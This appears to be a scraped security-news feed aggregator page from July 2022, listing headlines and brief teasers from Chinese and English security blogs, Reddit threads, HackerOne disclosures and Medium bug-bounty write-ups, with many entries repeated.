    作者:flamingo 原文链接:https://mp.weixin.qq.com/s/T3UfA1plrlG-e9lgfB4whg 前几天看到一个推送,websocket新型内存马。因其自身注册在Ws下面所以常规的内存检测脚本memshell scanner无法快速检出来。 项目地址:https://github.com/veo/wsMemShell 为了防止应急响应的时候翻车...
  • Open

    Linux tracing/profiling 基础:符号表、调用栈、perf/bpftrace 示例等(2022)
    整理一些 tracing/profiling 笔记, 内容主要来自 Practical Linux tracing 系列几篇文章。 1 引言 1.1 热点与调用栈分析(perf record/report/script) 1.2 符号(symbols) 1.3 小结 2 极简程序 hello-world:探究符号 2.1 C 源码 2.2 编译成目标文件(不带 -g) 2.3 查看目标文件(objdump/readelf) 2.4 用 bpftrace 跟踪 hello-world 程序执行 2.5 小结 3 符号 3.1 动态符号(.dynsym)vs. 局部符号(.symtab) 3.2 stripped vs. not stripped 3.2.1 手动去掉局部符号(strip -s) 3.2.2 再次用 bpftrace 跟踪局部函数 4 Debug symbol(gcc -g):DWARF 格式 4.1 Debug symbols 的用途或功能 4.1.1 功能一:将内存地址映射到具体某行源代码 4.1.2 功能二:调用栈展开(stack unwinding) 4.2 DWARF 格式存在的一些问题 5 调用栈展开(方式二):frame pointer 5.1 基本原理 5.2 例子 5.3 存在的问题:默认编译参数 -fomit-frame-pointer 6 Profiling & tracing 6.1 Perf profiling 6.2 bpftrace profiling 6.3 bpftrace event tracing Kernel tracing User space tracing 7 /proc/ /* 7.1 /proc/<pi…

  • Open

    Open Redirect .8x8.com
    8x8 disclosed a bug submitted by mr_k0anti: https://hackerone.com/reports/1637571
    Information disclosure ( Google Sales Channel )
    Shopify disclosed a bug submitted by hydraxanon82: https://hackerone.com/reports/1584718 - Bounty: $500
  • Open

    Mock Investigations or Training Cases??
    Anyone familiar with any sites or programs that you can try what you may know and perhaps some that show you an disk image and may show you things that you may have missed? Nearly a year of General Ed classes since my last Forensics class has taken a toll and i'm trying to refresh. Any help would be appreciated. Thanks. submitted by /u/DeviantWolfe [link] [comments]
    PowerShell command history (windows forensics)
    When running a PowerShell command or a ps1 script, what forensic evidence is left behind? I know of the event logs and general PowerShell history. Is there any where else that can be investigated to see if PowerShell commands have been executed? or any particular arftifects to look for? Still new to windows forensics, thanks in advance :) submitted by /u/EnormousJohnson [link] [comments]
    Where can I find useful system logs in windows and Linux beside the basic event viewer and journalctl logs?
    I work on debugging system error and want to get good at forensics. Where can I find good system logs. Sorry if it's basic question. submitted by /u/iObjectUrHonor [link] [comments]
  • Open

    A little bit of housekeeping please.
    Apologies mods - not trying to add to any workload but there are a few glaring issues. could we reroute the search box to either koalabear84's search or site:reddit.com/r/opendirectories %s either has pros and cons but reddit search is objectively shit while we're at it - since we have to add a flair/tag when we post could we not also implement a mandatory search in the posting process? I know reddit kinda implements this atm but again, it's search is frankly fucking dismal. finally: in the reporting dialog could we add a couple of entries: This has been reposted more times than that reaction pic of THIS IS NOT AN OPEN DIRECTORY EDITED. submitted by /u/ringofyre [link] [comments]
  • Open

    Join the Morningstar's Discord Server! tells you ways to get free stuff from websites
    submitted by /u/nightmarejh10 [link] [comments]
  • Open

    Finding 0-days in Enterprise Application
    No content preview
    FFUF-ing RECON
    , or how to get to P1–P3 from a slightly different recon Continue reading on InfoSec Write-ups »
  • Open

    Finding 0-days in Enterprise Application
    No content preview
    FFUF-ing RECON
    , or how to get to P1–P3 from a slightly different recon Continue reading on InfoSec Write-ups »
  • Open

    Finding 0-days in Enterprise Application
    No content preview
    FFUF-ing RECON
    , or how to get to P1–P3 from a slightly different recon Continue reading on InfoSec Write-ups »
  • Open

    Finding 0-days in Enterprise Application
    A tale of ‘Site-wide Account Takeover’ Continue reading on InfoSec Write-ups »
    Gauing+Nuclei for Instant Bounties
    Back again with the instant bounties series. Last time we learned how to score instant bounties with Google dorks so check that out if you… Continue reading on Medium »
    FFUF-ing RECON
    , or how to get to P1–P3 from a slightly different recon Continue reading on InfoSec Write-ups »
    A Story Of My First Bug Bounty
    Hello everyone, Continue reading on Medium »
    MSA Weekly 4 — “Cara Mendapatakn Subdomain Menggunakan Subfinder & Sudomy
    Dalam proses penetration atau hacking ada beberapa step/workflow yang biasa dilakukan oleh para penetration tester atau hacker sebelum… Continue reading on Medium »
    Web Application Security & OWASP’s Juice Shop
    Throughout my entire IT career, I have always felt I lack programming and web development skills. This stems from the fact that I have… Continue reading on Medium »
    Intro to Bug Bounty Hunting.
    Hey Guys! Hope you all are doing great! Continue reading on Medium »
    A Simple Buffer Overflow Demonstration — Part 2
    Hello Security folks, In previous article, we came to know about what is Buffer Overflow, Its types, and how it occurs. In this article… Continue reading on Medium »
  • Open

    LSASS Memory Dump and Detection
    Basic Overview Continue reading on Medium »
  • Open

    SecWiki News 2022-07-17 Review
    应急能力提升6:应急响应专题总结会 by aerfa 应急能力提升5:应急响应报告点评 by aerfa 应急能力提升4:实战应急响应经验 by aerfa 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-17 Review
    应急能力提升6:应急响应专题总结会 by aerfa 应急能力提升5:应急响应报告点评 by aerfa 应急能力提升4:实战应急响应经验 by aerfa 更多最新文章,请访问SecWiki
  • Open

    新型RedAlert勒索病毒针对VMWare ESXi服务器
    新型RedAlert勒索病毒针对VMWare ESXi服务器
    pythonweb SSTI的payload构造思路研究
    文前漫谈接触到pythonweb SSTI也有一段时间了,给我的感觉就是原理也容易理解,但是在利用上总有些难度。(不能够灵活运用),想来想去还是原理不太清楚,借着这篇文章,从初学者的角度,从原理的方向
    SSH协议中隧道与代理的用法详解
    关于ssh协议中的隧道连接与代理的相关用法详解
    SAFEIS:UNISWAP安全事件溯源分析!
    针对UNISWAP的黑客攻击事件,很多用户损失惨重,其中不乏知名人士。
  • Open

    51 OSINT extensions for Chrome
    Let’s try to turn the standard CHROME browser into a full-fledged OSINT explorer tool. Continue reading on Medium »
    SPY NEWS: 2022 — Week 28
    Summary of the espionage-related news stories for the Week 28 (July 10–16) of 2022. Continue reading on Medium »
    Mengidentifikasi Perekrut Buzzer MyPertamina
    Per tanggal 1 Juli 2022, Pertamina telah menguji coba pembelian bahan bakar menggunakan aplikasi MyPertamina. Banyak pro dan kontra di… Continue reading on Medium »
    Who’s this war against? Data from June
    Data suggests Russia’s attention in its invasion of Ukraine is directed more towards westward ‘unfriendly’ countries than to Ukraine… Continue reading on Medium »
  • Open

    GitHub - karimhabush/cyberowl: A daily updated summary of the most frequent types of security incidents currently being reported from different sources.
    submitted by /u/karimhabush [link] [comments]
    Build your first LLVM Obfuscator
    submitted by /u/CyberMasterV [link] [comments]
  • Open

    StartupApproved\Run, pt II
    On the heels of my last blog post on this topic, I had a couple of thoughts and insights that I wanted to research a bit, and then address. I wanted to take a look at ways that the StartupApproved\Run key might be impacted, so I started by grabbing the contents of that key based on what we saw from the previous post, which are illustrated in figure 1. Fig 1: StartupApproved\Run key contents Then, I captured the contents of the Run key, illustrated in figure 2. Fig 2: Run key contents As you can see in figure 2, there appears to be an entry missing, the "com.squirrel.Teams.Teams" value. We know from the previous blog post that this value was disabled on 14 Jul 2021, just over a year ago. I have no idea how that happened, as it wasn't part of an intentional test at the t…
  • Open

    Basic BloodHound query for a single machine
    Hi, I am practicing with some Active Directory labs (hackthebox); I dowloaded stuff with Sharphound and imported into my bloodhound installation. There are about 2k users a 500 computers in thi s lab. Let's say I would like to "start" with a specific computer name and look for best path to compromise such machine, how can I do that? What is the query syntax for search a specific computer name? thankyou submitted by /u/g-simon [link] [comments]
    Can attacker gain access to my private network application through pivoting and/or lateral movement?
    I am using a public wifi network to work on some web development. When I start a nodejs express server at my local machine at port 3000, I can access that website on another device (that is connected to the same public wifi network) by going to the http://(private ip address of nodejs host assigned by public wifi dhcp):3000/index.html , for example. So to prevent this, I had my phone connect to the public wifi network and fired up the built in android hotspot. Then I connected my nodejs host machine to the hotspot to start the express server at port 3000. I could no longer access that website anymore from a different device on the public wifi network because express server was now inside the private network within that public wifi network. I can ping from a device inside the android hotspot private network to a device in the public wifi network. But the device from the public wifi network could not ping devices inside the android hotspot private network. Is there a way for an attacker on that public wifi network to gain access to my android hotspot private network without knowing the SSID passphrase? Could they use some kind of network pivoting technique so that they can access my private html website on port 3000? Using something like ip route add? submitted by /u/Fuzzht1 [link] [comments]
    Practical malware analysis book versions
    Hey guys! I'm looking at getting the practical malware analysis book by Michael Sikorski and Andrew Honig, however there seems to be one published in 2012 and another in 2017. Does anyone know if there's any difference between the 2? I'm thinking maybe one is the ebook and the other paper but content the same. Cheers! submitted by /u/semening [link] [comments]

  • Open

    An Overview of Exploit Dev Course Content
    submitted by /u/PM_ME_YOUR_SHELLCODE [link] [comments]
  • Open

    New.Student.Help
    Hi everyone, I’m a student new to cyber forensics. I have read up about file carving and hex carving but was wondering how the two is related. Is hex carving considered file carving? Or maybe a subset of file carving? Also, given a situation where you have to search a company’s file system to scrape all the images in a word document, how best would you approach this? Can hex carving or file carving be considered in this situation and if so, which is better? Thank you submitted by /u/EricaHellscythe [link] [comments]
    Mem dump with malware
    Does anyone know where I can get my hands on memory dump files with live malware on it? I tried running TheZoo on a VM, but I'm having trouble getting malware to detonate other than ransomware. I figured someone might know where I can get a .dmp file that already has the malware in it. Thank you! submitted by /u/DeadBirdRugby [link] [comments]
    New to Forensics, Drop some Forensics tools/training content
    I tried Autopsy and Volatility at a basic level, what else should I go for? submitted by /u/ItsMeTheBatman [link] [comments]
    When does SANS eat itself
    Most SANS DFIR courses are now $7640 and with the exam fee of $949 they price out at $8589. I have attended multiple SANS events and currently hold two GIAC certs so I know the quality of the classes BUT... what is the tipping point? Where getting close to 10K for a one week class. At some point it becomes unsustainable for most organizations. The DFIR training area seems ripe for disruption. Why isn't there any competition offering a similar product at a much better price point? submitted by /u/7174n6 [link] [comments]
  • Open

    password reset No Rate Limiting
    hey gusy my name RISHI NIKAM i am Security Researcher and bug bounty hunter Continue reading on Medium »
    First Bug Bounty from DOS: Taking the service down
    Hello friends, This is Faique, a security researcher & an ethical hacker from India, and this is a journey to my first bug bounty. Continue reading on Medium »
    CRLF to Account takeover (chaining bugs)
    Hi, everyone Continue reading on Medium »
    Authorization token leak from verify email endpoint
    While testing a website I found that the verify email endpoint was leaking the authorization tokens of any verified users by just passing… Continue reading on Medium »
    Local File Inclusion (interesting method)
    Hello researchers, This is Captain_hook and I decide to Share An interesting LFI vulnerability That I found In BC’s program. Continue reading on Medium »
    Subdomain takeover and Text injection on a 404 error page-$100 bounty
    Hello everyone! I’m Jeewan Bhatta and I am here with my first hackerone bug write-up. Hope you all are doing great. So now I am gonna tell… Continue reading on Medium »
    Business logic error
    I Can Delete your email, you can’t register on the website Continue reading on Medium »
    Bypass OTP by manipulating response parameters
    In this real life tutorial you will learn about parameter manipulating vulnerability which can make hackers to bypass otp and finally… Continue reading on Medium »
    But hunting from a car on a cheap, mostly,
    Or, how I learned to hate typing on my phone Continue reading on Medium »
  • Open

    What can I do to get hired as a SOC analyst?
    Just passed Security+ and already have Network+, coming from an intelligence analysis background (metadata analysis, creating workflows with Python, threat research and development, etc.) and very serious about getting into network security. What can I do to improve my chances at landing a SOC analyst role? These are the things I'm planning on doing: Practicing SOC skills on letsdefend.io (and possibly also hackthebox and tryhackme) - more interested in blue team at the moment though Building up my homelab (just ordered a modem and better router to replace my ISP-provided gear) and potentially setting up a syslog server and/or putting freeradius on my Pi (definitely overkill for a home network but it's to learn) 16 hour SOC core skills course with Antisyphon/Black Hills Security (this week!) What else can be doing aside from the obvious (reading up about CVEs, cyber news, etc.) to land this SOC gig? Get another cert? CySA+? Linux+? GSEC? GSOC? (I can get reimbursed for some of the costs but there are expensive as heck). Thanks! submitted by /u/WLANtasticBeasts [link] [comments]
    Blue team bug bounty equivalent?
    Just wondering if there is some program like bug bounties but for blue team professionals. Edit: The characteristics of the bug bounty ideas such as doable on free time, accessible any time and earns you money. Idk what else to add but I think you get the idea. submitted by /u/Chroll-On [link] [comments]
  • Open

    How Windows Processes Work - CreateProcess Workflow (Part 2)
    submitted by /u/sciencestudent99 [link] [comments]
  • Open

    MS-Interloper: On the Subject of Malicious MSIs
    submitted by /u/dmchell [link] [comments]
    Process Injection using QueueUserAPC Technique in Windows
    submitted by /u/tbhaxor [link] [comments]
  • Open

    SecWiki News 2022-07-16 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-16 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Can use the Reddit android app as usual even though revoking the access of it from reddit.com
    Reddit disclosed a bug submitted by sateeshn: https://hackerone.com/reports/1632186
  • Open

    RouterSpace from HackTheBox — Detailed Walkthrough
    No content preview
  • Open

    RouterSpace from HackTheBox — Detailed Walkthrough
    No content preview
  • Open

    RouterSpace from HackTheBox — Detailed Walkthrough
    No content preview
  • Open

    Decade old anarchy stuff.
    Again, sorry if it was already posted. https://www.hou2600.org/ftp/textfiles/ submitted by /u/RainyAbrar [link] [comments]
    Random 2010 stuff?
    Don't know if it's already posted. http://www.fricking.ninja/DIY/index/ submitted by /u/RainyAbrar [link] [comments]

  • Open

    Null to Bug: Insecure Direct Object Reference
    What is Null to Bug? Continue reading on Medium »
    How I got CEH (Certified Ethical Hacker) Master Certified. (Resources included)
    Hello Infosec Family. I am Shubham Ghosh, an Information Security Analyst with an experience of 2+ years from Jharkhand, India. This… Continue reading on Medium »
    How I Got My First CVE
    Hello readers, Continue reading on Medium »
    GOOD RECON LEADS TO SENSSITIVE ACCOUNTS
    Hello people i have back with new hacking story !! . so yesterday i was hunting on one of the vdp program let’s consider it xyz.com . so… Continue reading on Medium »
    Ability to login as google staff in Google Cloud Community
    -Gaurav Bhatia (Bug Hunter, CTF Player) Continue reading on Medium »
    How I spammed a Google meet (But for good)
    Hacking isn’t always about account takeover, authentication bypass, or authorization abuse. Sometimes it’s about functionality abuse and… Continue reading on Medium »
    Information Source Code Disclosure Directory .git — MNC Play
    Pada tanggal 15 Oktober 2020 saya menemukan BUG SQL Injection di payment.mncplay.id tetapi tidak ada respons dari pihak MNC Play. Continue reading on Medium »
    Paramspider lead to find SQLI vulnerability
    In this tutorial you will learn how real hackers can find injection vulnerabilities like : Continue reading on Medium »
  • Open

    Huge directory of every skill site you can think of!
    submitted by /u/orphickalon [link] [comments]
  • Open

    What is OSINT? Part — 1
    Do you use social media like Instagram, Facebook, Twitter, or Snapchat? Ahh, I know most of you are using it. Continue reading on Medium »
    War in Ukraine / July 14
    Day 142: Grain in exchange for the lifting of sanctions Continue reading on Medium »
    Holehe Transform using Maltego
    Overview Continue reading on Medium »
  • Open

    Insecure Object Permissions for Guest User leads to access to internal documents!
    IBM disclosed a bug submitted by mocr7: https://hackerone.com/reports/1089583
    Add me email address Authentication bypass
    LinkedIn disclosed a bug submitted by raajeevrathnam: https://hackerone.com/reports/1607645
    POST BASED REFLECTED XSS IN dailydeals.mtn.co.za
    MTN Group disclosed a bug submitted by shuvam321: https://hackerone.com/reports/1451394
    [h1-2102] shopApps query from the graphql at /users/api returns all existing created apps, including private ones
    Shopify disclosed a bug submitted by inhibitor181: https://hackerone.com/reports/1085332 - Bounty: $1900
  • Open

    What are some must-learn relevant concepts in C?
    Things like pointers, memory management etc? Thanks submitted by /u/UseFit [link] [comments]
    Do you have Microsoft 365 focused security blogs you follow?
    Hey folks, I'm trying to build out my RSS feed I browse each morning when I come in. I'm looking to build out a whole section dedicated to M365 security and was wondering if folks here had any go to blogs they like, either Microsoft or third party? submitted by /u/beagle_bathouse [link] [comments]
    How to parse Linux logs to Graylog?
    Hello, We already forwarded Linux logs to our Graylog syslog server (community version). However, the logs are not parsed. One option is to use extractors, but this approach is kinda manual and time-consuming. Is there any other way to parse the Linux logs properly? Thank you. submitted by /u/sanba06c [link] [comments]
  • Open

    IOC-based threat hunting for free and without registration
    submitted by /u/Cultural_Budget6627 [link] [comments]
  • Open

    SecWiki News 2022-07-15 Review
    攻防演练之域控加固篇 by ourren 攻防演练之域控检测篇 by ourren 火山引擎CWPP(Elkeid) 真实对抗案例分享 by ourren 软件供应链安全风险分析研究 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-15 Review
    攻防演练之域控加固篇 by ourren 攻防演练之域控检测篇 by ourren 火山引擎CWPP(Elkeid) 真实对抗案例分享 by ourren 软件供应链安全风险分析研究 by ourren 更多最新文章,请访问SecWiki
  • Open

    Digium Phones Under Attack: Insight Into the Web Shell Implant
    We witnessed more than 500,000 unique samples of malicious traffic targeting Digium Asterisk software for VoIP phone devices. The post Digium Phones Under Attack: Insight Into the Web Shell Implant appeared first on Unit 42.
  • Open

    PortSwigginar - 13 July
    Thank you to those who attended our recent PortSwigginar on Burp Suite Enterprise Edition. Below is the video of the session, which included; A recap on “what’s new” within the product for those who h
  • Open

    PortSwigginar - 13 July
    Thank you to those who attended our recent PortSwigginar on Burp Suite Enterprise Edition. Below is the video of the session, which included; A recap on “what’s new” within the product for those who h
  • Open

    ‍IW Weekly #10: 5 Articles, 4 Threads, 3 Videos, 2 Github Repos, 1 Job Alert
    No content preview
    WiFi Hacking Week Pt. 4 — Evil Twin Attacks
    No content preview
    Android WebView Hacking — Enable WebView Debugging
    No content preview
  • Open

    ‍IW Weekly #10: 5 Articles, 4 Threads, 3 Videos, 2 Github Repos, 1 Job Alert
    No content preview
    WiFi Hacking Week Pt. 4 — Evil Twin Attacks
    No content preview
    Android WebView Hacking — Enable WebView Debugging
    No content preview
  • Open

    ‍IW Weekly #10: 5 Articles, 4 Threads, 3 Videos, 2 Github Repos, 1 Job Alert
    No content preview
    WiFi Hacking Week Pt. 4 — Evil Twin Attacks
    No content preview
    Android WebView Hacking — Enable WebView Debugging
    No content preview
  • Open

    JARM 指纹混淆随机化技术实现
    作者:风起 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 基于JARM指纹的C2识别 JARM的工作原理是主动向目标TLS服务器发送10个特殊构造的TLS Client Hello包,以在TLS服务器中提取独特的响应,并捕获TLS Server Hello响应的特定属性,然后以特定的方式对聚合的TLS服务器响应进行...
  • Open

    JARM 指纹混淆随机化技术实现
    作者:风起 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 基于JARM指纹的C2识别 JARM的工作原理是主动向目标TLS服务器发送10个特殊构造的TLS Client Hello包,以在TLS服务器中提取独特的响应,并捕获TLS Server Hello响应的特定属性,然后以特定的方式对聚合的TLS服务器响应进行...
  • Open

    微软曝光了苹果系统沙盒逃逸漏洞的细节
    微软公开披露苹果系统应用沙盒访问问题漏洞的技术细节,影响iOS、iPadOS、macOS、tvOS 和 watchOS系统。
    红队实录系列(一)-从 NodeJS 代码审计到内网突破
    此实录起因是公司的一场红蓝对抗实战演习,首先通过内部自研资产平台通过分布式扫描对目标资产进行全端口指纹识别。
    Mantis——迄今为止的最强僵尸网络
    Cloudflare宣布其上个月缓解的破纪录的DDoS攻击源自一个名为Mantis的新僵尸网络。
    遭勒索软件攻击,美190万条医疗记录被泄露
    美国一家收债员专业金融公司 (PFC) 报告了一起数据泄露事件。
    FreeBuf早报 | 万代南梦宫证实遭黑客入侵;智慧工厂未做好网络攻击应对准备
    2022 年 6 月,全国各级网络举报部门受理举报 1498.7 万件,环比下降 2.3%、同比增长 9.8%。
    内网文件如何确保安全传递? | FreeBuf甲方群话题讨论
    企业在通过U盘、网盘等方式,或通过内网私域进行传递文件时,该如何确保其安全性?
    FreeBuf周报 | 超1万家企业遭受钓鱼攻击;多款本田车型存在漏洞,车辆可被远程控制
    各位 FreeBufer 周末好~我们总结推荐了本周的热点资讯、优质文章和省心工具,保证大家不错过本周的每一个重点!
  • Open

    IDA Plugin to reconstruct .proto files used in the analyzed binary
    submitted by /u/Martypx00 [link] [comments]
    CVE-2022-29593
    submitted by /u/9lyph [link] [comments]
  • Open

    CVE-2022-29593 – Authentication Bypass by Capture Replay (Dingtian-DT-R002)
    Article URL: https://github.com/9lyph/CVE-2022-29593 Comments URL: https://news.ycombinator.com/item?id=32105629 Points: 1 # Comments: 0
  • Open

    Malicious Steganography
    How to inject malicious powershell scripts into an image? Continue reading on Medium »

  • Open

    Healthcare IT: Encrypt PHI Traffic Inside the Network?
    For those of you in healthcare IT, do you encrypt your interface transmissions inside your network? Encryption: External vs. Internal Traffic We'd all agree that unencrypted PHI can't be sent/shouldn't be sent over the internet. All external connections require a VPN or other encryption. For internal traffic, some/many organizations considers encryption as not needed. Instead, they rely on network and server protections to, "implement one or more alternative security measures to accomplish the same purpose." Without encryption, however, the internal network carries a tremendous amount of PHI as plain text. What is your organization doing vs. the below? HIPAA Encryption Requirement If an HIT org does not encrypt PHI, either in-motion or at rest, it must: Document its alternative …
    Side-hustling as VAPT freelancer, any advice? also discussion :)
    Hi everybody. I don't know if this is the right place to talk about these themes but i've seen some (really) older questions around so i think that i'll try to ask here. I'm a young computer engineer (master's) and i'm working for an IT company in the Cyber Security department, my tasks are to look after endpoint protection, firewalls, vpns and so on. I know how to do pentests, I specialized in that in my university and i've partecipated in some real projects, I also aim to acquire some certifications around. Long story short, I think that i'll try in the future to side-hustle by doing penetration tests and vulnerability assestments for $$, my questions are: Do some of you have done something similar? Which could be a good platform, or, what could be some good platforms to start with online? Do you have some advices in general? Do you think that there could be some other security-related side-hustles that could be better economically speaking? (i have to say that i love doing pentests). Hoping for your help, i would like to thank any one of you that wil answer to this port in advance :) submitted by /u/Set-New [link] [comments]
    Does SQL injection require a 'changed' scope in the CVSS score?
    I'm currently going through some vulnerabilities for an advisory and one of my coworkers said that SQL injection always has the scope set to 'changed' when calculating CVSS scores. That doesn't seem right to me since the web application is still the affected host. It also bumps up our CVSS score to look extra scary -- a 9.9 for SQLi that requires low-privileges. Example vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H If the SQL server is on the same host, shouldn't the scope remain unchanged? Thanks! submitted by /u/Reemertastic [link] [comments]
    What’s something less technical and less stressful to transition to coming from pentesting?
    Hi everyone. I’ve been doing pentesting for about 1 - 1.5 years now. I had a very high interest in pursuing a pentesting career about 2-3 years ago and I worked towards that goal by doing a lot of self learning and getting a couple certs (not OSCP, but pentest+ and eJPT). Now that I’ve been working in pentesting for a little while, I’ve realized that this isn’t for me and I want out. I find the stress that comes from performing penetration tests on a weekly basis and having to constantly battle with developers and app team owners is just too much for me. Before pentesting I worked in appsec (both static and dynamic) and before that had a very short stint as a Junior developer coming out of college. So Ive been on the technical side things pretty much my entire career. I find myself now at a place where i want to be less technical. I just want to have a stress free job that’s consistent. Any recommendations on what else I could explore? submitted by /u/anon2user [link] [comments]
    Does configuring a specific SSID create possibilities for additional security controls?
    My team makes use of a shared office space. The owner of the space offers public WiFi without password. It's possible to have our own SSID configured on the WiFi and enforce passwords for getting access. I'm interested to learn what extra security controls we can implement if we have our own SSID. submitted by /u/But-I-Am-a-Robot [link] [comments]
    Is a DNS Query to Coin Mining Domain dangerous?
    Hello, I've received many repeated alerts from Security Onion, which stated that "ET POLICY Observed DNS Query to Coin Mining Domain (nanopool .org)". The source IP address is from an internal endpoint and the destination IP address is from a DNS server. Is this event dangerous? In my opinion, it did not make any direct connection to the external IP. So, I do not see this event a positive alert. Any advice would be highly appreciated. submitted by /u/sanba06c [link] [comments]
  • Open

    OAUTH Misconfiguration leads to Full Account Takeover
    Hello, you amazing Hackers!! My name is Aditya Singh a Security Researcher from India. in today’s blog, we are going to see OAUTH… Continue reading on Medium »
    Basic Linux skills for bug bounty hunting and ethical hacking (day-2)
    Hello guys, it’s Selim, back here with another interesting article, in the previous article we learn about how a beginner gets into bug… Continue reading on Medium »
    start hacking carrier part 3
    today i ll share a list of bug bounty writ up list and bug bounty checklist that i follow… Continue reading on Medium »
    Easy to find vulnerabilities that might get paid [part-2]
    Hello hackers I am back with another short write-up so this is the second part of easy-to-find vulnerabilities that might get paid so… Continue reading on Medium »
    How I found my first bug
    Hi guys, this is my first post in celebration of my first bug found. Continue reading on Medium »
    Abusing URL Shortners for fun and profit
    Hello Security Researchers Continue reading on Medium »
    Recon em ASN’s
    Esse artigo visa demonstrar de forma básica o recon em ASN’s. Antes de entrarmos no assunto de recon em ASN’s, é preciso falar de alguns… Continue reading on Medium »
    Beginners Guide to Bug Bounty
    This guide will give you an idea on how to start out in bug bounties if you’re new to the topic. Continue reading on Medium »
    Reset password vulnerability
    In this tutorial you will learn how you can hack any users in your vulnerable website without having their password to login. Continue reading on Medium »
  • Open

    Anyone got a practice exam for FOR508 SANS
    Hi guys, ​ doing the 508 exam in 2 weeks and wanted to know if someone has a spare practice exam test for me - if anyone got one, would also pay for it ... PM if possible THX :) submitted by /u/schoeringhumer [link] [comments]
  • Open

    OPEN SOURCE INTELLIGENCE WITH BLACKBIRD
    Information provided in this article is to assist users in scanning their own networks and systems, or networks and systems for which they… Continue reading on Medium »
    War in Ukraine / July 14
    Day 141: Tragedy in Vinnytsia — more than 20 victims Continue reading on Medium »
    The Moonshot Threat Bulletin at a Glance: June 2022
    This blog contains a short excerpt from June’s Moonshot Threat Bulletin. If you would like to access a one month free-trial to the full… Continue reading on Medium »
  • Open

    Showcasing Red Teaming TTPs — Weaponizing Custom Made C2 Channel via MS Word Macro (Part 2)
    Hi everyone, in previous blogpost (and video) we showcased how to embed powershell payload inside VBA macro for MS Word, but we were… Continue reading on Medium »
    How Purple Teaming Made Me A Better Blue Teamer
    Purple Team experiences Continue reading on Medium »
    Hashcat 101: Cracking Password Hashes
    Let say you are hacking a Linux box and all you have is a shadow.log like below Continue reading on Medium »
  • Open

    SecWiki News 2022-07-14 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-14 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Understanding and Bypassing Rate Limiting's
    Introduction Continue reading on InfoSec Write-ups »
    Elliptic Curve Signatures and How to Use Them in Your Java Application
    Most important properties of Elliptic Curves explained and how you can compute them in Java. Continue reading on InfoSec Write-ups »
    Let’s talk about buffer overflow
    A buffer overflow, or buffer overrun, occurs when more data is put into a fixed-length buffer than the buffer can handle. Continue reading on InfoSec Write-ups »
  • Open

    Understanding and Bypassing Rate Limiting's
    Introduction Continue reading on InfoSec Write-ups »
    Elliptic Curve Signatures and How to Use Them in Your Java Application
    Most important properties of Elliptic Curves explained and how you can compute them in Java. Continue reading on InfoSec Write-ups »
    Let’s talk about buffer overflow
    A buffer overflow, or buffer overrun, occurs when more data is put into a fixed-length buffer than the buffer can handle. Continue reading on InfoSec Write-ups »
  • Open

    Understanding and Bypassing Rate Limiting's
    Introduction Continue reading on InfoSec Write-ups »
    Elliptic Curve Signatures and How to Use Them in Your Java Application
    Most important properties of Elliptic Curves explained and how you can compute them in Java. Continue reading on InfoSec Write-ups »
    Let’s talk about buffer overflow
    A buffer overflow, or buffer overrun, occurs when more data is put into a fixed-length buffer than the buffer can handle. Continue reading on InfoSec Write-ups »
  • Open

    BGGP3: Crash on the Cob
    submitted by /u/netsecfriends [link] [comments]
    Exploiting Arbitrary Object Instantiations in PHP without Custom Classes
    submitted by /u/albinowax [link] [comments]
    Researching access tokens for fun and knowledge
    submitted by /u/One-Assistance-8552 [link] [comments]
  • Open

    A Discord server for OSINT collaboration?
    submitted by /u/OvertOperator [link] [comments]
  • Open

    FreeBuf早报 | Uniswap 在网络钓鱼攻击中被盗800万美元;PFC承认遭勒索软件攻击
    Uniswap 在网络钓鱼攻击中被盗800万美元;PFC承认遭勒索软件攻击191万患者信息被泄露。
    斗象科技获来自国家信息安全漏洞库(CNNVD)“漏洞通报”业务感谢信!
    不断夯实技术和平台优势,为提升国家网络安全漏洞治理体系和能力贡献力量。
    Java CommonsBeanUtils1 反序列化手写 EXP
    Java CommonsBeanUtils 反序列化,从先不看 yso 的链子,自己尝试寻找漏洞的角度学习。
    赶紧自查,AMD和Intel CPU又曝新漏洞
    苏黎世联邦理工学院研究人员发现了一个影响众多旧 AMD 和 Intel 微处理器的漏洞,可导致基于 Spectre 的推测执行攻击。
    Google Play上的新Android恶意软件安装了300万次
    Google 应用商店上出现了一个新的安卓恶意软件,累计下载次数已经超过 300 万次。
    不降反升,乌克兰网络机构报告第二季度网络攻击激增
    针对乌克兰的网络攻击的频率和数量在今年第二季度激增。
    僵尸网络样本行为分析
    本文简单分析僵尸网络病毒行为,并提出针对性解决方案。
    新勒索软件Lilith出现,已有企业中招
    一个代号为“Lilith”的新勒索软件行动近日出现在网络上,并展开了攻击行动。
    信息安全官齐论剑 |「CIS网络安全创新大会·夏日版」CSO论坛回顾
    未来我国CSO体系将会如何发展,CSO的能力评价指标有哪些,具体岗位职责又有哪些变化等,CSO闭门论坛开展了热烈的分享和讨论。
    联想超70款笔记本电脑被曝新型UEFI固件漏洞
    利用UEFI 固件漏洞的攻击非常危险,能让攻击者在操作系统刚启动时运行恶意软件,甚至在 Windows 内置安全保护被激活之前。
    攻防演练在即,盒子宇宙「重要机密」泄露!
    挖蛙带你一探究竟~
  • Open

    Lazarus 黑客组织使用的 YamaBot 恶意软件分析
    作者:朝長 秀誠 译者:知道创宇404实验室翻译组 原文链接:https://blogs.jpcert.or.jp/en/2022/07/yamabot.html JPCERT/CC正在持续调查Lazarus的活动。2021年,JPCERT/CC在CODE BLUE和HITCON上介绍了其攻击活动。 https://github.com/JPCERTCC/Lazarus-research/ ...
  • Open

    Lazarus 黑客组织使用的 YamaBot 恶意软件分析
    作者:朝長 秀誠 译者:知道创宇404实验室翻译组 原文链接:https://blogs.jpcert.or.jp/en/2022/07/yamabot.html JPCERT/CC正在持续调查Lazarus的活动。2021年,JPCERT/CC在CODE BLUE和HITCON上介绍了其攻击活动。 https://github.com/JPCERTCC/Lazarus-research/ ...
